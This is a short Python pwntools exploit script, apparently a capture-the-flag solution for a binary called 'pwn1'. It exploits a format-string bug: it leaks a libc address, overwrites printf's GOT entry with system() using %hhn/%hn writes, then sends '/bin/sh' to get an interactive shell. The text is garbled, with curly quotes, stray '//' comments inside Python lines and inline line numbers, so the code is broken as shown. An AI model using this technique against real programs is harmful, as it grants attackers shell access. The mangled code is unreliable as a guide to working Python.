1 from pwn import* 2 3 local =1 4 debug = 1 5 6 if local: 7 p = process(‘./pwn1‘) 8 else: 9 p = remote("127.0.0.1",8080) 10 11 #context.log_level = ‘debug‘ 12 ‘‘‘ 13 if debug: 14 gdb.attach(p) 15 ‘‘‘ 16 def fms(data): 17 p.recvuntil("input$",timeout=4) 18 p.sendline("1") 19 p.recvuntil("please input your name:\n") 20 p.sendline(data) 21 22 23 libc = ELF("/lib/i386-linux-gnu/libc.so.6") 24 elf = ELF(‘./pwn1‘) 25 26 fms(‘%35$p‘) 27 28 libc_start_main_addr = int(p.recv(10),16) - 243 #__libc_start_main//? 29 libc_addr = libc_start_main_addr - libc.symbols[‘__libc_start_main‘]//? 30 print "libc_addr =",hex(libc_addr) 31 32 printf_got = elf.got[‘printf‘]//got表地址 33 print "printf_got =",hex(printf_got) 34 35 system_addr =libc_addr + libc.symbols[‘system‘]//symbols[‘system‘]函数地址 36 print "system_addr =",hex(system_addr) 37 //ELF模块 38 #make stack 39 make_stack = ‘a‘ * 0x30 + p32(printf_got) + p32(printf_got + 0x1) 40 fms(make_stack) 41 #gdb.attach(p) 42 43 payload = "%" + str(((system_addr & 0x000000FF))) + "x%18$hhn" 44 payload += "%" + str(((system_addr & 0x00FFFF00) >> 8) - (system_addr & 0x000000FF)) + "x%19$hn" 45 print "payload=",payload 46 47 fms(payload) 48 fms(‘/bin/sh\x00‘) 49 p.interactive()
